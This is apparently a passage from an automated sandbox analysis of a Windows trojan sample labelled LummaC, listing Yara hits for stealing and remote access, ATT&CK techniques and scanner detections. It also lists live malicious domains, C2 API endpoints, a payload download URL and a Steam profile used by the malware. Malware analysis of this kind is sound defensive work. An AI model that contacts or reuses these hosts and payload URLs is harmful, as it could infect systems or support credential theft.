                  Source: Amcache.hve.10.dr | Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.10.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.10.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.10.dr | Binary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 3.3.1A68.tmp.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.1A68.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.1A68.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.1A68.tmp.exe.24e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 3.3.1A68.tmp.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.1A68.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.1A68.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.1A68.tmp.exe.24e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_004218CC
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_00420BF6
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_024E1B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_024E1B33
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe | Code function: 0_2_024E0E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_024E0E5D
                  MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the count shown next to the technique in the report's matrix)

                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
                  Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
                  Execution: Native API (2); PowerShell (1); At; Cron; Launchd; Scheduled Task; Systemd Timers
                  Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
                  Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
                  Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (1); Process Injection (11); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (4); Software Packing (22); DLL Side-Loading (1)
                  Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
                  Discovery: System Time Discovery (1); Security Software Discovery (131); Virtualization/Sandbox Evasion (1); Process Discovery (1); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (24)
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
                  Collection: Screen Capture (1); Archive Collected Data (1); Clipboard Data (3); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
                  Command and Control: Encrypted Channel (11); Ingress Tool Transfer (12); Non-Application Layer Protocol (3); Application Layer Protocol (124); Fallback Channels; Multiband Communication; Commonly Used Port
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
                  Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  Behavior Graph ID: 1575138 | Sample: rHrG691f7q.exe | Startdate: 14/12/2024 | Architecture: WINDOWS | Score: 100

                  Start node: effecterectz.xyz; diffuculttan.xyz; 8 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures. diffuculttan.xyz: Performs DNS queries to domains with low reputation.
                  rHrG691f7q.exe (1, 18), started: 176.113.115.19, 49726, 80 SELECTELRU Russian Federation; post-to-me.com 104.21.56.70, 443, 49722 CLOUDFLARENETUS United States. Dropped: C:\Users\user\AppData\Local\...\1A68.tmp.exe, PE32; C:\Users\user\...\ScreenUpdateSync[1].exe, PE32. Signatures: Detected unpacking (overwrites its own PE header).
                  1A68.tmp.exe, started by rHrG691f7q.exe: immureprech.biz 104.21.22.222, 443, 49752 CLOUDFLARENETUS United States; deafeninggeh.biz 104.21.96.1, 443, 49759 CLOUDFLARENETUS United States; steamcommunity.com 23.55.153.106, 443, 49768 AKAMAI-ASN1EU United States. Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); 2 other signatures.
                  WerFault.exe (22, 16), started by 1A68.tmp.exe. Dropped: C:\ProgramData\Microsoft\...\Report.wer, Unicode.

                  Source | Detection | Scanner | Label | Link
                  rHrG691f7q.exe | 55% | ReversingLabs | Win32.Trojan.LummaC |
                  rHrG691f7q.exe | 41% | Virustotal | | Browse
                  rHrG691f7q.exe | 100% | Avira | HEUR/AGEN.1312567 |
                  rHrG691f7q.exe | 100% | Joe Sandbox ML | |
                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | 100% | Avira | HEUR/AGEN.1312567 |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exe | 100% | Avira | HEUR/AGEN.1312567 |
                  C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exe | 42% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | 42% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  http://176.113.115.19/ScreenUpdateSync.exeu | 0% | Avira URL Cloud | safe |
                  http://176.113.115.19/ScreenUpdateSync.exel | 0% | Avira URL Cloud | safe |
                  https://wrathful-jammy.cyou/~ | 100% | Avira URL Cloud | malware |
                  http://176.113.115.19/ScreenUpdateSync.exef | 0% | Avira URL Cloud | safe |
                  https://deafeninggeh.biz/z | 100% | Avira URL Cloud | malware |
                  https://effecterectz.xyz/apiS | 100% | Avira URL Cloud | malware |
                  https://wrathful-jammy.cyou/api | 100% | Avira URL Cloud | malware |
                  http://176.113.115.19/ScreenUpdateSync.exef3 | 0% | Avira URL Cloud | safe |
                  http://176.113.115.19/ | 0% | Avira URL Cloud | safe |
                  https://diffuculttan.xyz/api | 100% | Avira URL Cloud | malware |
                  http://176.113.115.19/ScreenUpdateSync.exeo3 | 0% | Avira URL Cloud | safe |
                  https://post-to-me.com/track_prt.php?sub=0&cc=DEN | 100% | Avira URL Cloud | malware |
                  https://deafeninggeh.biz/apiy | 100% | Avira URL Cloud | malware |
                  https://awake-weaves.cyou/apiZ | 100% | Avira URL Cloud | malware |
                  https://effecterectz.xyz/api8 | 100% | Avira URL Cloud | malware |
                  http://176.113.115.19/ScreenUpdateSync.exet3 | 0% | Avira URL Cloud | safe |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  post-to-me.com | 104.21.56.70 | true | false | | high
                  steamcommunity.com | 23.55.153.106 | true | false | | high
                  immureprech.biz | 104.21.22.222 | true | false | | high
                  deafeninggeh.biz | 104.21.96.1 | true | false | | high
                  sordid-snaked.cyou | unknown | unknown | false | | high
                  diffuculttan.xyz | unknown | unknown | false | | high
                  effecterectz.xyz | unknown | unknown | false | | high
                  awake-weaves.cyou | unknown | unknown | false | | high
                  wrathful-jammy.cyou | unknown | unknown | false | | high
                  debonairnukk.xyz | unknown | unknown | false | | high
                  Name | Malicious | Antivirus Detection | Reputation
                  sordid-snaked.cyou | false | | high
                  deafeninggeh.biz | false | | high
                  effecterectz.xyz | false | | high
                  wrathful-jammy.cyou | false | | high
                  https://steamcommunity.com/profiles/76561199724331900 | false | | high
                  awake-weaves.cyou | false | | high
                  immureprech.biz | false | | high
                  https://immureprech.biz/api | false | | high
                  debonairnukk.xyz | false | | high
                  diffuculttan.xyz | false | | high
                  https://post-to-me.com/track_prt.php?sub=0&cc=DE | false | | high
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://player.vimeo.com | 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  http://176.113.115.19/ScreenUpdateSync.exel | rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://steamcommunity.com/?subsection=broadcasts | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  http://176.113.115.19/ScreenUpdateSync.exeu | rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://store.steampowered.com/subscriber_agreement/ | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://www.gstatic.cn/recaptcha/ | 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://wrathful-jammy.cyou/api | 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                  http://176.113.115.19/ScreenUpdateSync.exe | rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623211072.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623107198.0000000000A36000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  http://176.113.115.19/ScreenUpdateSync.exef | rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  http://www.valvesoftware.com/legal.htm | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://www.youtube.com | 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://www.google.com | 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  http://176.113.115.19/ScreenUpdateSync.exef3 | rHrG691f7q.exe, 00000000.00000003.4485117055.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623211072.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://deafeninggeh.biz/z | 1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433836788.00000000009AE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | false | |
                                                                                      high
                                                                                      https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://wrathful-jammy.cyou/~1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://effecterectz.xyz/apiS1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://diffuculttan.xyz/api1A68.tmp.exe, 00000003.00000003.2373734520.0000000000932000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000930000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.0000000000933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                https://s.ytimg.com;1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=11A68.tmp.exe, 00000003.00000002.2433623776.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://176.113.115.19/rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://community.fastly.steamstatic.com/1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://steam.tv/1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://176.113.115.19/ScreenUpdateSync.exeo3rHrG691f7q.exe, 00000000.00000003.4485117055.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623211072.0000000000AA7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://awake-weaves.cyou/apiZ1A68.tmp.exe, 00000003.00000003.2373734520.0000000000932000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000930000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.0000000000933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          https://post-to-me.com/track_prt.php?sub=&cc=DErHrG691f7q.exe, 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://store.steampowered.com/privacy_agreement/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://steamcommunity.com/j1A68.tmp.exe, 00000003.00000003.2373734520.0000000000932000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000930000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.0000000000933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://store.steampowered.com/points/shop/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://sketchfab.com1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://lv.queniujq.cn1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://deafeninggeh.biz/apiy1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              unknown
                                                                                                                              https://steamcommunity.com/profiles/76561199724331900/inventory/1A68.tmp.exe, 00000003.00000002.2433623776.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
